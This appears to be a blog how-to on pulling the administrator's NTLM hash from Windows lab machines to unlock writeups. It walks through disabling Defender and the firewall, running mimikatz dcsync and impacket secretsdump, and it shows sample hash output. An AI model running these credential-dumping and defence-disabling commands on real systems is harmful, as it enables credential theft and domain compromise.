Preface: If you want to decrypt a writeup for an active windows box on HTB or from other plattforms using the NTLM hash of the administartor user, you are on the right place. In this How-To post I will show you how you can extract the NTLM hash of the administrator user (probably for any user) on windows machines.
At first we will use mimikatz. In the second example I show you how to use secretdump for it.
Using mimikatz
After getting a shell as administrator
you can follow the steps below to extract the NTLM hash.
First disable the real time protection
if its enabled:
Set-MpPreference -DisableRealtimeMonitoring $true
Then disable the Anti-Virus
protection:
netsh advfirewall set currentprofile state off
Then run mimikatz with the following arguments:
./mimikatz.exe "lsadump::dcsync /user:administrator"
You will get an output like this:
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"
.#####. mimikatz 2.2.0 (x86) #18362 Feb 8 2020 12:26:09
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 1/24/2020 9:14:15 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
And the NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff
.
Just copy paste it in the writeup where it is asked for.
Using Secretdump
If you have owned a machine and you have the password of the user administrator, you can get the NTLM hash using secrectdump. Secretdump is a tool from impacket-tools.
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
The hash is divided into two sections, first the LM hash and second one is NTLM.
Here we got the NTLM hash which is d9485863c1b9e07543aa40cbb4ab9dfd
.
Just copy paste it in the writeup where it is asked for.